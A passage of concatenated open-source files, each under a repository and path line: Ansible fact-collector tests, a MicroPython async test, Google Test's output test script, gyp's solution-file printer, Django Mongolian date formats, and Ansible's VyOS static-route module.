fact_collector = self.collector_class()
self.assertRaises(CollectorException,
fact_collector.collect,
module=module,
collected_facts=self.collected_facts)
def test_collect_with_namespace(self):
module = self._mock_module()
fact_collector = self.collector_class()
self.assertRaises(CollectorException,
fact_collector.collect_with_namespace,
module=module,
collected_facts=self.collected_facts)
class TestApparmorFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'apparmor']
valid_subsets = ['apparmor']
fact_namespace = 'ansible_apparmor'
collector_class = ApparmorFactCollector
def test_collect(self):
facts_dict = super(TestApparmorFacts, self).test_collect()
self.assertIn('status', facts_dict['apparmor'])
class TestCapsFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'caps']
valid_subsets = ['caps']
fact_namespace = 'ansible_system_capabilities'
collector_class = SystemCapabilitiesFactCollector
def _mock_module(self):
mock_module = Mock()
mock_module.params = {'gather_subset': self.gather_subset,
'gather_timeout': 10,
'filter': '*'}
mock_module.get_bin_path = Mock(return_value='/usr/sbin/capsh')
mock_module.run_command = Mock(return_value=(0, 'Current: =ep', ''))
return mock_module
class TestCmdLineFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'cmdline']
valid_subsets = ['cmdline']
fact_namespace = 'ansible_cmdline'
collector_class = CmdLineFactCollector
def test_parse_proc_cmdline_uefi(self):
uefi_cmdline = r'initrd=\70ef65e1a04a47aea04f7b5145ea3537\4.10.0-19-generic\initrd root=UUID=50973b75-4a66-4bf0-9764-2b7614489e64 ro quiet'
expected = {'initrd': r'\70ef65e1a04a47aea04f7b5145ea3537\4.10.0-19-generic\initrd',
'root': 'UUID=50973b75-4a66-4bf0-9764-2b7614489e64',
'quiet': True,
'ro': True}
fact_collector = self.collector_class()
facts_dict = fact_collector._parse_proc_cmdline(uefi_cmdline)
self.assertDictEqual(facts_dict, expected)
def test_parse_proc_cmdline_fedora(self):
cmdline_fedora = r'BOOT_IMAGE=/vmlinuz-4.10.16-200.fc25.x86_64 root=/dev/mapper/fedora-root ro rd.lvm.lv=fedora/root rd.luks.uuid=luks-c80b7537-358b-4a07-b88c-c59ef187479b rd.lvm.lv=fedora/swap rhgb quiet LANG=en_US.UTF-8' # noqa
expected = {'BOOT_IMAGE': '/vmlinuz-4.10.16-200.fc25.x86_64',
'LANG': 'en_US.UTF-8',
'quiet': True,
'rd.luks.uuid': 'luks-c80b7537-358b-4a07-b88c-c59ef187479b',
'rd.lvm.lv': 'fedora/swap',
'rhgb': True,
'ro': True,
'root': '/dev/mapper/fedora-root'}
fact_collector = self.collector_class()
facts_dict = fact_collector._parse_proc_cmdline(cmdline_fedora)
self.assertDictEqual(facts_dict, expected)
def test_parse_proc_cmdline_dup_console(self):
example = r'BOOT_IMAGE=/boot/vmlinuz-4.4.0-72-generic root=UUID=e12e46d9-06c9-4a64-a7b3-60e24b062d90 ro console=tty1 console=ttyS0'
# FIXME: Two 'console' keywords? Using a dict for the fact value here loses info. Currently the 'last' one wins
expected = {'BOOT_IMAGE': '/boot/vmlinuz-4.4.0-72-generic',
'root': 'UUID=e12e46d9-06c9-4a64-a7b3-60e24b062d90',
'ro': True,
'console': 'ttyS0'}
fact_collector = self.collector_class()
facts_dict = fact_collector._parse_proc_cmdline(example)
# TODO: fails because we lose a 'console'
self.assertDictEqual(facts_dict, expected)
class TestDistributionFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'distribution']
valid_subsets = ['distribution']
fact_namespace = 'ansible_distribution'
collector_class = DistributionFactCollector
class TestDnsFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'dns']
valid_subsets = ['dns']
fact_namespace = 'ansible_dns'
collector_class = DnsFactCollector
class TestEnvFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'env']
valid_subsets = ['env']
fact_namespace = 'ansible_env'
collector_class = EnvFactCollector
def test_collect(self):
facts_dict = super(TestEnvFacts, self).test_collect()
self.assertIn('HOME', facts_dict['env'])
class TestFipsFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'fips']
valid_subsets = ['fips']
fact_namespace = 'ansible_fips'
collector_class = FipsFactCollector
class TestHardwareCollector(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'hardware']
valid_subsets = ['hardware']
fact_namespace = 'ansible_hardware'
collector_class = HardwareCollector
collected_facts = {'ansible_architecture': 'x86_64'}
class TestNetworkCollector(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'network']
valid_subsets = ['network']
fact_namespace = 'ansible_network'
collector_class = NetworkCollector
class TestPkgMgrFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'pkg_mgr']
valid_subsets = ['pkg_mgr']
fact_namespace = 'ansible_pkgmgr'
collector_class = PkgMgrFactCollector
class TestPlatformFactCollector(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'platform']
valid_subsets = ['platform']
fact_namespace = 'ansible_platform'
collector_class = PlatformFactCollector
class TestPythonFactCollector(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'python']
valid_subsets = ['python']
fact_namespace = 'ansible_python'
collector_class = PythonFactCollector
class TestSelinuxFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'selinux']
valid_subsets = ['selinux']
fact_namespace = 'ansible_selinux'
collector_class = SelinuxFactCollector
def test_no_selinux(self):
with patch('ansible.module_utils.facts.system.selinux.HAVE_SELINUX', False):
module = self._mock_module()
fact_collector = self.collector_class()
facts_dict = fact_collector.collect(module=module)
self.assertIsInstance(facts_dict, dict)
self.assertFalse(facts_dict['selinux'])
return facts_dict
class TestServiceMgrFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'service_mgr']
valid_subsets = ['service_mgr']
fact_namespace = 'ansible_service_mgr'
collector_class = ServiceMgrFactCollector
# TODO: dedupe some of this test code
@patch('ansible.module_utils.facts.system.service_mgr.get_file_content', return_value=None)
def test_no_proc1(self, mock_gfc):
# no /proc/1/comm, ps returns non-0
# should fallback to 'service'
module = self._mock_module()
module.run_command = Mock(return_value=(1, '', 'wat'))
fact_collector = self.collector_class()
facts_dict = fact_collector.collect(module=module)
self.assertIsInstance(facts_dict, dict)
self.assertEqual(facts_dict['service_mgr'], 'service')
@patch('ansible.module_utils.facts.system.service_mgr.get_file_content', return_value=None)
def test_no_proc1_ps_random_init(self, mock_gfc):
# no /proc/1/comm, ps returns '/sbin/sys11' which we dont know
# should end up return 'sys11'
module = self._mock_module()
module.run_command = Mock(return_value=(0, '/sbin/sys11', ''))
fact_collector = self.collector_class()
facts_dict = fact_collector.collect(module=module)
self.assertIsInstance(facts_dict, dict)
self.assertEqual(facts_dict['service_mgr'], 'sys11')
@patch('ansible.module_utils.facts.system.service_mgr.get_file_content', return_value=None)
def test_clowncar(self, mock_gfc):
# no /proc/1/comm, ps fails, distro and system are clowncar
# should end up return 'sys11'
module = self._mock_module()
module.run_command = Mock(return_value=(1, '', ''))
collected_facts = {'distribution': 'clowncar',
'system': 'ClownCarOS'}
fact_collector = self.collector_class()
facts_dict = fact_collector.collect(module=module,
collected_facts=collected_facts)
self.assertIsInstance(facts_dict, dict)
self.assertEqual(facts_dict['service_mgr'], 'service')
# TODO: reenable these tests when we can mock more easily
# @patch('ansible.module_utils.facts.system.service_mgr.get_file_content', return_value=None)
# def test_sunos_fallback(self, mock_gfc):
# # no /proc/1/comm, ps fails, 'system' is SunOS
# # should end up return 'smf'?
# module = self._mock_module()
# # FIXME: the result here is a kluge to at least cover more of service_mgr.collect
# # TODO: remove
# # FIXME: have to force a pid for results here to get into any of the system/distro checks
# module.run_command = Mock(return_value=(1, ' 37 ', ''))
# collected_facts = {'system': 'SunOS'}
# fact_collector = self.collector_class(module=module)
# facts_dict = fact_collector.collect(collected_facts=collected_facts)
# print('facts_dict: %s' % facts_dict)
# self.assertIsInstance(facts_dict, dict)
# self.assertEqual(facts_dict['service_mgr'], 'smf')
# @patch('ansible.module_utils.facts.system.service_mgr.get_file_content', return_value=None)
# def test_aix_fallback(self, mock_gfc):
# # no /proc/1/comm, ps fails, 'system' is SunOS
# # should end up return 'smf'?
# module = self._mock_module()
# module.run_command = Mock(return_value=(1, '', ''))
# collected_facts = {'system': 'AIX'}
# fact_collector = self.collector_class(module=module)
# facts_dict = fact_collector.collect(collected_facts=collected_facts)
# print('facts_dict: %s' % facts_dict)
# self.assertIsInstance(facts_dict, dict)
# self.assertEqual(facts_dict['service_mgr'], 'src')
# @patch('ansible.module_utils.facts.system.service_mgr.get_file_content', return_value=None)
# def test_linux_fallback(self, mock_gfc):
# # no /proc/1/comm, ps fails, 'system' is SunOS
# # should end up return 'smf'?
# module = self._mock_module()
# module.run_command = Mock(return_value=(1, ' 37 ', ''))
# collected_facts = {'system': 'Linux'}
# fact_collector = self.collector_class(module=module)
# facts_dict = fact_collector.collect(collected_facts=collected_facts)
# print('facts_dict: %s' % facts_dict)
# self.assertIsInstance(facts_dict, dict)
# self.assertEqual(facts_dict['service_mgr'], 'sdfadf')
class TestSshPubKeyFactCollector(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'ssh_pub_keys']
valid_subsets = ['ssh_pub_keys']
fact_namespace = 'ansible_ssh_pub_leys'
collector_class = SshPubKeyFactCollector
class TestUserFactCollector(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'user']
valid_subsets = ['user']
fact_namespace = 'ansible_user'
collector_class = UserFactCollector
class TestVirtualFacts(BaseFactsTest):
__test__ = True
gather_subset = ['!all', 'virtual']
valid_subsets = ['virtual']
fact_namespace = 'ansible_virtual'
collector_class = VirtualCollector
|
deshipu/micropython
|
refs/heads/master
|
tests/basics/async_await.py
|
63
|
# test basic await expression
# adapted from PEP0492
async def abinary(n):
print(n)
if n <= 0:
return 1
l = await abinary(n - 1)
r = await abinary(n - 1)
return l + 1 + r
o = abinary(4)
try:
while True:
o.send(None)
except StopIteration:
print('finished')
|
ideasiii/ControllerPlatform
|
refs/heads/master
|
Controller-Mongodb/extLibs/mongo-cxx-driver/src/third_party/gtest-1.7.0/test/gtest_output_test.py
|
1733
|
#!/usr/bin/env python
#
# Copyright 2008, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
"""Tests the text output of Google C++ Testing Framework.
SYNOPSIS
gtest_output_test.py --build_dir=BUILD/DIR --gengolden
# where BUILD/DIR contains the built gtest_output_test_ file.
gtest_output_test.py --gengolden
gtest_output_test.py
"""
__author__ = 'wan@google.com (Zhanyong Wan)'
import os
import re
import sys
import gtest_test_utils
# The flag for generating the golden file
GENGOLDEN_FLAG = '--gengolden'
CATCH_EXCEPTIONS_ENV_VAR_NAME = 'GTEST_CATCH_EXCEPTIONS'
IS_WINDOWS = os.name == 'nt'
# TODO(vladl@google.com): remove the _lin suffix.
GOLDEN_NAME = 'gtest_output_test_golden_lin.txt'
PROGRAM_PATH = gtest_test_utils.GetTestExecutablePath('gtest_output_test_')
# At least one command we exercise must not have the
# --gtest_internal_skip_environment_and_ad_hoc_tests flag.
COMMAND_LIST_TESTS = ({}, [PROGRAM_PATH, '--gtest_list_tests'])
COMMAND_WITH_COLOR = ({}, [PROGRAM_PATH, '--gtest_color=yes'])
COMMAND_WITH_TIME = ({}, [PROGRAM_PATH,
'--gtest_print_time',
'--gtest_internal_skip_environment_and_ad_hoc_tests',
'--gtest_filter=FatalFailureTest.*:LoggingTest.*'])
COMMAND_WITH_DISABLED = (
{}, [PROGRAM_PATH,
'--gtest_also_run_disabled_tests',
'--gtest_internal_skip_environment_and_ad_hoc_tests',
'--gtest_filter=*DISABLED_*'])
COMMAND_WITH_SHARDING = (
{'GTEST_SHARD_INDEX': '1', 'GTEST_TOTAL_SHARDS': '2'},
[PROGRAM_PATH,
'--gtest_internal_skip_environment_and_ad_hoc_tests',
'--gtest_filter=PassingTest.*'])
GOLDEN_PATH = os.path.join(gtest_test_utils.GetSourceDir(), GOLDEN_NAME)
def ToUnixLineEnding(s):
"""Changes all Windows/Mac line endings in s to UNIX line endings."""
return s.replace('\r\n', '\n').replace('\r', '\n')
def RemoveLocations(test_output):
"""Removes all file location info from a Google Test program's output.
Args:
test_output: the output of a Google Test program.
Returns:
output with all file location info (in the form of
'DIRECTORY/FILE_NAME:LINE_NUMBER: 'or
'DIRECTORY\\FILE_NAME(LINE_NUMBER): ') replaced by
'FILE_NAME:#: '.
"""
return re.sub(r'.*[/\\](.+)(\:\d+|\(\d+\))\: ', r'\1:#: ', test_output)
def RemoveStackTraceDetails(output):
"""Removes all stack traces from a Google Test program's output."""
# *? means "find the shortest string that matches".
return re.sub(r'Stack trace:(.|\n)*?\n\n',
'Stack trace: (omitted)\n\n', output)
def RemoveStackTraces(output):
"""Removes all traces of stack traces from a Google Test program's output."""
# *? means "find the shortest string that matches".
return re.sub(r'Stack trace:(.|\n)*?\n\n', '', output)
def RemoveTime(output):
"""Removes all time information from a Google Test program's output."""
return re.sub(r'\(\d+ ms', '(? ms', output)
def RemoveTypeInfoDetails(test_output):
"""Removes compiler-specific type info from Google Test program's output.
Args:
test_output: the output of a Google Test program.
Returns:
output with type information normalized to canonical form.
"""
# some compilers output the name of type 'unsigned int' as 'unsigned'
return re.sub(r'unsigned int', 'unsigned', test_output)
def NormalizeToCurrentPlatform(test_output):
"""Normalizes platform specific output details for easier comparison."""
if IS_WINDOWS:
# Removes the color information that is not present on Windows.
test_output = re.sub('\x1b\\[(0;3\d)?m', '', test_output)
# Changes failure message headers into the Windows format.
test_output = re.sub(r': Failure\n', r': error: ', test_output)
# Changes file(line_number) to file:line_number.
test_output = re.sub(r'((\w|\.)+)\((\d+)\):', r'\1:\3:', test_output)
return test_output
def RemoveTestCounts(output):
"""Removes test counts from a Google Test program's output."""
output = re.sub(r'\d+ tests?, listed below',
'? tests, listed below', output)
output = re.sub(r'\d+ FAILED TESTS',
'? FAILED TESTS', output)
output = re.sub(r'\d+ tests? from \d+ test cases?',
'? tests from ? test cases', output)
output = re.sub(r'\d+ tests? from ([a-zA-Z_])',
r'? tests from \1', output)
return re.sub(r'\d+ tests?\.', '? tests.', output)
def RemoveMatchingTests(test_output, pattern):
"""Removes output of specified tests from a Google Test program's output.
This function strips not only the beginning and the end of a test but also
all output in between.
Args:
test_output: A string containing the test output.
pattern: A regex string that matches names of test cases or
tests to remove.
Returns:
Contents of test_output with tests whose names match pattern removed.
"""
test_output = re.sub(
r'.*\[ RUN \] .*%s(.|\n)*?\[( FAILED | OK )\] .*%s.*\n' % (
pattern, pattern),
'',
test_output)
return re.sub(r'.*%s.*\n' % pattern, '', test_output)
def NormalizeOutput(output):
"""Normalizes output (the output of gtest_output_test_.exe)."""
output = ToUnixLineEnding(output)
output = RemoveLocations(output)
output = RemoveStackTraceDetails(output)
output = RemoveTime(output)
return output
def GetShellCommandOutput(env_cmd):
"""Runs a command in a sub-process, and returns its output in a string.
Args:
env_cmd: The shell command. A 2-tuple where element 0 is a dict of extra
environment variables to set, and element 1 is a string with
the command and any flags.
Returns:
A string with the command's combined standard and diagnostic output.
"""
# Spawns cmd in a sub-process, and gets its standard I/O file objects.
# Set and save the environment properly.
environ = os.environ.copy()
environ.update(env_cmd[0])
p = gtest_test_utils.Subprocess(env_cmd[1], env=environ)
return p.output
def GetCommandOutput(env_cmd):
"""Runs a command and returns its output with all file location
info stripped off.
Args:
env_cmd: The shell command. A 2-tuple where element 0 is a dict of extra
environment variables to set, and element 1 is a string with
the command and any flags.
"""
# Disables exception pop-ups on Windows.
environ, cmdline = env_cmd
environ = dict(environ) # Ensures we are modifying a copy.
environ[CATCH_EXCEPTIONS_ENV_VAR_NAME] = '1'
return NormalizeOutput(GetShellCommandOutput((environ, cmdline)))
def GetOutputOfAllCommands():
"""Returns concatenated output from several representative commands."""
return (GetCommandOutput(COMMAND_WITH_COLOR) +
GetCommandOutput(COMMAND_WITH_TIME) +
GetCommandOutput(COMMAND_WITH_DISABLED) +
GetCommandOutput(COMMAND_WITH_SHARDING))
test_list = GetShellCommandOutput(COMMAND_LIST_TESTS)
SUPPORTS_DEATH_TESTS = 'DeathTest' in test_list
SUPPORTS_TYPED_TESTS = 'TypedTest' in test_list
SUPPORTS_THREADS = 'ExpectFailureWithThreadsTest' in test_list
SUPPORTS_STACK_TRACES = False
CAN_GENERATE_GOLDEN_FILE = (SUPPORTS_DEATH_TESTS and
SUPPORTS_TYPED_TESTS and
SUPPORTS_THREADS)
class GTestOutputTest(gtest_test_utils.TestCase):
def RemoveUnsupportedTests(self, test_output):
if not SUPPORTS_DEATH_TESTS:
test_output = RemoveMatchingTests(test_output, 'DeathTest')
if not SUPPORTS_TYPED_TESTS:
test_output = RemoveMatchingTests(test_output, 'TypedTest')
test_output = RemoveMatchingTests(test_output, 'TypedDeathTest')
test_output = RemoveMatchingTests(test_output, 'TypeParamDeathTest')
if not SUPPORTS_THREADS:
test_output = RemoveMatchingTests(test_output,
'ExpectFailureWithThreadsTest')
test_output = RemoveMatchingTests(test_output,
'ScopedFakeTestPartResultReporterTest')
test_output = RemoveMatchingTests(test_output,
'WorksConcurrently')
if not SUPPORTS_STACK_TRACES:
test_output = RemoveStackTraces(test_output)
return test_output
def testOutput(self):
output = GetOutputOfAllCommands()
golden_file = open(GOLDEN_PATH, 'rb')
# A mis-configured source control system can cause \r appear in EOL
# sequences when we read the golden file irrespective of an operating
# system used. Therefore, we need to strip those \r's from newlines
# unconditionally.
golden = ToUnixLineEnding(golden_file.read())
golden_file.close()
# We want the test to pass regardless of certain features being
# supported or not.
# We still have to remove type name specifics in all cases.
normalized_actual = RemoveTypeInfoDetails(output)
normalized_golden = RemoveTypeInfoDetails(golden)
if CAN_GENERATE_GOLDEN_FILE:
self.assertEqual(normalized_golden, normalized_actual)
else:
normalized_actual = NormalizeToCurrentPlatform(
RemoveTestCounts(normalized_actual))
normalized_golden = NormalizeToCurrentPlatform(
RemoveTestCounts(self.RemoveUnsupportedTests(normalized_golden)))
# This code is very handy when debugging golden file differences:
if os.getenv('DEBUG_GTEST_OUTPUT_TEST'):
open(os.path.join(
gtest_test_utils.GetSourceDir(),
'_gtest_output_test_normalized_actual.txt'), 'wb').write(
normalized_actual)
open(os.path.join(
gtest_test_utils.GetSourceDir(),
'_gtest_output_test_normalized_golden.txt'), 'wb').write(
normalized_golden)
self.assertEqual(normalized_golden, normalized_actual)
if __name__ == '__main__':
if sys.argv[1:] == [GENGOLDEN_FLAG]:
if CAN_GENERATE_GOLDEN_FILE:
output = GetOutputOfAllCommands()
golden_file = open(GOLDEN_PATH, 'wb')
golden_file.write(output)
golden_file.close()
else:
message = (
"""Unable to write a golden file when compiled in an environment
that does not support all the required features (death tests, typed tests,
and multiple threads). Please generate the golden file using a binary built
with those features enabled.""")
sys.stderr.write(message)
sys.exit(1)
else:
gtest_test_utils.Main()
|
Pflanzgurke/glimpse_client
|
refs/heads/develop
|
3rdparty/breakpad/src/tools/gyp/tools/pretty_sln.py
|
806
|
#!/usr/bin/env python
# Copyright (c) 2012 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""Prints the information in a sln file in a diffable way.
It first outputs each projects in alphabetical order with their
dependencies.
Then it outputs a possible build order.
"""
__author__ = 'nsylvain (Nicolas Sylvain)'
import os
import re
import sys
import pretty_vcproj
def BuildProject(project, built, projects, deps):
# if all dependencies are done, we can build it, otherwise we try to build the
# dependency.
# This is not infinite-recursion proof.
for dep in deps[project]:
if dep not in built:
BuildProject(dep, built, projects, deps)
print project
built.append(project)
def ParseSolution(solution_file):
# All projects, their clsid and paths.
projects = dict()
# A list of dependencies associated with a project.
dependencies = dict()
# Regular expressions that matches the SLN format.
# The first line of a project definition.
begin_project = re.compile(('^Project\("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942'
'}"\) = "(.*)", "(.*)", "(.*)"$'))
# The last line of a project definition.
end_project = re.compile('^EndProject$')
# The first line of a dependency list.
begin_dep = re.compile('ProjectSection\(ProjectDependencies\) = postProject$')
# The last line of a dependency list.
end_dep = re.compile('EndProjectSection$')
# A line describing a dependency.
dep_line = re.compile(' *({.*}) = ({.*})$')
in_deps = False
solution = open(solution_file)
for line in solution:
results = begin_project.search(line)
if results:
# Hack to remove icu because the diff is too different.
if results.group(1).find('icu') != -1:
continue
# We remove "_gyp" from the names because it helps to diff them.
current_project = results.group(1).replace('_gyp', '')
projects[current_project] = [results.group(2).replace('_gyp', ''),
results.group(3),
results.group(2)]
dependencies[current_project] = []
continue
results = end_project.search(line)
if results:
current_project = None
continue
results = begin_dep.search(line)
if results:
in_deps = True
continue
results = end_dep.search(line)
if results:
in_deps = False
continue
results = dep_line.search(line)
if results and in_deps and current_project:
dependencies[current_project].append(results.group(1))
continue
# Change all dependencies clsid to name instead.
for project in dependencies:
# For each dependencies in this project
new_dep_array = []
for dep in dependencies[project]:
# Look for the project name matching this cldis
for project_info in projects:
if projects[project_info][1] == dep:
new_dep_array.append(project_info)
dependencies[project] = sorted(new_dep_array)
return (projects, dependencies)
def PrintDependencies(projects, deps):
print "---------------------------------------"
print "Dependencies for all projects"
print "---------------------------------------"
print "-- --"
for (project, dep_list) in sorted(deps.items()):
print "Project : %s" % project
print "Path : %s" % projects[project][0]
if dep_list:
for dep in dep_list:
print " - %s" % dep
print ""
print "-- --"
def PrintBuildOrder(projects, deps):
print "---------------------------------------"
print "Build order "
print "---------------------------------------"
print "-- --"
built = []
for (project, _) in sorted(deps.items()):
if project not in built:
BuildProject(project, built, projects, deps)
print "-- --"
def PrintVCProj(projects):
for project in projects:
print "-------------------------------------"
print "-------------------------------------"
print project
print project
print project
print "-------------------------------------"
print "-------------------------------------"
project_path = os.path.abspath(os.path.join(os.path.dirname(sys.argv[1]),
projects[project][2]))
pretty = pretty_vcproj
argv = [ '',
project_path,
'$(SolutionDir)=%s\\' % os.path.dirname(sys.argv[1]),
]
argv.extend(sys.argv[3:])
pretty.main(argv)
def main():
# check if we have exactly 1 parameter.
if len(sys.argv) < 2:
print 'Usage: %s "c:\\path\\to\\project.sln"' % sys.argv[0]
return 1
(projects, deps) = ParseSolution(sys.argv[1])
PrintDependencies(projects, deps)
PrintBuildOrder(projects, deps)
if '--recursive' in sys.argv:
PrintVCProj(projects)
return 0
if __name__ == '__main__':
sys.exit(main())
|
aisipos/django
|
refs/heads/master
|
django/conf/locale/mn/formats.py
|
619
|
# -*- encoding: utf-8 -*-
# This file is distributed under the same license as the Django package.
#
from __future__ import unicode_literals
# The *_FORMAT strings use the Django date format syntax,
# see http://docs.djangoproject.com/en/dev/ref/templates/builtins/#date
DATE_FORMAT = 'd F Y'
TIME_FORMAT = 'g:i A'
# DATETIME_FORMAT =
# YEAR_MONTH_FORMAT =
# MONTH_DAY_FORMAT =
SHORT_DATE_FORMAT = 'j M Y'
# SHORT_DATETIME_FORMAT =
# FIRST_DAY_OF_WEEK =
# The *_INPUT_FORMATS strings use the Python strftime format syntax,
# see http://docs.python.org/library/datetime.html#strftime-strptime-behavior
# DATE_INPUT_FORMATS =
# TIME_INPUT_FORMATS =
# DATETIME_INPUT_FORMATS =
# DECIMAL_SEPARATOR =
# THOUSAND_SEPARATOR =
# NUMBER_GROUPING =
|
bearstech/ansible
|
refs/heads/devel
|
lib/ansible/modules/network/vyos/vyos_static_route.py
|
11
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2017, Ansible by Red Hat, inc
#
# This file is part of Ansible by Red Hat
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'core'}
DOCUMENTATION = """
---
module: vyos_static_route
version_added: "2.4"
author: "Trishna Guha (@trishnag)"
short_description: Manage static IP routes on Cisco VyOS network devices
description:
- This module provides declarative management of static
IP routes on Vyatta VyOS network devices.
options:
prefix:
description:
- Network prefix of the static route.
C(mask) param should be ignored if C(prefix) is provided
with C(mask) value C(prefix/mask).
mask:
description:
- Network prefix mask of the static route.
next_hop:
description:
- Next hop IP of the static route.
admin_distance:
description:
- Admin distance of the static route.
aggregate:
description: List of static route definitions
purge:
description:
- Purge static routes not defined in the aggregates parameter.
default: no
state:
description:
- State of the static route configuration.
default: present
choices: ['present', 'absent']
"""
EXAMPLES = """
- name: configure static route
vyos_static_route:
prefix: 192.168.2.0
mask: 24
next_hop: 10.0.0.1
- name: configure static route prefix/mask
vyos_static_route:
prefix: 192.168.2.0/16
next_hop: 10.0.0.1
- name: remove configuration
vyos_static_route:
prefix: 192.168.2.0
mask: 16
next_hop: 10.0.0.1
state: absent
- name: configure aggregates of static routes
vyos_static_route:
aggregate:
- { prefix: 192.168.2.0, mask: 24, next_hop: 10.0.0.1 }
- { prefix: 192.168.3.0, mask: 16, next_hop: 10.0.2.1 }
- { prefix: 192.168.3.0/16, next_hop: 10.0.2.1 }
"""
RETURN = """
commands:
description: The list of configuration mode commands to send to the device
returned: always
type: list
sample:
- set protocols static route 192.168.2.0/16 next-hop 10.0.0.1
"""
import re
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils.vyos import get_config, load_config
from ansible.module_utils.vyos import vyos_argument_spec, check_args
def spec_to_commands(updates, module):
commands = list()
want, have = updates
for w in want:
prefix = w['prefix']
mask = w['mask']
next_hop = w['next_hop']
admin_distance = w['admin_distance']
state = w['state']
del w['state']
if state == 'absent' and w in have:
commands.append('delete protocols static route %s/%s' % (prefix, mask))
elif state == 'present' and w not in have:
cmd = 'set protocols static route %s/%s next-hop %s' % (prefix, mask, next_hop)
if admin_distance != 'None':
cmd += ' distance %s' % (admin_distance)
commands.append(cmd)
return commands
def config_to_dict(module):
data = get_config(module)
obj = []
for line in data.split('\n'):
if line.startswith('set protocols static route'):
match = re.search(r'static route (\S+)', line, re.M)
prefix = match.group(1).split('/')[0]
mask = match.group(1).split('/')[1]
if 'next-hop' in line:
match_hop = re.search(r'next-hop (\S+)', line, re.M)
next_hop = match_hop.group(1).strip("'")
match_distance = re.search(r'distance (\S+)', line, re.M)
if match_distance is not None:
admin_distance = match_distance.group(1)[1:-1]
else:
admin_distance = None
if admin_distance is not None:
obj.append({'prefix': prefix,
'mask': mask,
'next_hop': next_hop,
'admin_distance': admin_distance})
else:
obj.append({'prefix': prefix,
'mask': mask,
'next_hop': next_hop,
'admin_distance': 'None'})
return obj
def map_params_to_obj(module):
obj = []
if 'aggregate' in module.params and module.params['aggregate']:
for c in module.params['aggregate']:
d = c.copy()
if '/' in d['prefix']:
d['mask'] = d['prefix'].split('/')[1]
d['prefix'] = d['prefix'].split('/')[0]
if 'state' not in d:
d['state'] = module.params['state']
if 'admin_distance' not in d:
d['admin_distance'] = str(module.params['admin_distance'])
obj.append(d)
else:
prefix = module.params['prefix'].strip()
if '/' in prefix:
mask = prefix.split('/')[1]
prefix = prefix.split('/')[0]
else:
mask = module.params['mask'].strip()
next_hop = module.params['next_hop'].strip()
admin_distance = str(module.params['admin_distance'])
state = module.params['state']
obj.append({
'prefix': prefix,
'mask': mask,
'next_hop': next_hop,
'admin_distance': admin_distance,
'state': state
})
return obj
def main():
""" main entry point for module execution
"""
argument_spec = dict(
prefix=dict(type='str'),
mask=dict(type='str'),
next_hop=dict(type='str'),
admin_distance=dict(type='int'),
aggregate=dict(type='list'),
purge=dict(type='bool'),
state=dict(default='present', choices=['present', 'absent'])
)
argument_spec.update(vyos_argument_spec)
required_one_of = [['aggregate', 'prefix']]
required_together = [['prefix', 'next_hop']]
mutually_exclusive = [['aggregate', 'prefix']]
module = AnsibleModule(argument_spec=argument_spec,
required_one_of=required_one_of,
required_together=required_together,
supports_check_mode=True)
warnings = list()
check_args(module, warnings)
result = {'changed': False}
if warnings:
result['warnings'] = warnings
want = map_params_to_obj(module)
have = config_to_dict(module)
commands = spec_to_commands((want, have), module)
result['commands'] = commands
if commands:
commit = not module.check_mode
load_config(module, commands, commit=commit)
result['changed'] = True
module.exit_json(**result)
if __name__ == '__main__':
main()
|
jmolloy/pedigree
|
refs/heads/master
|
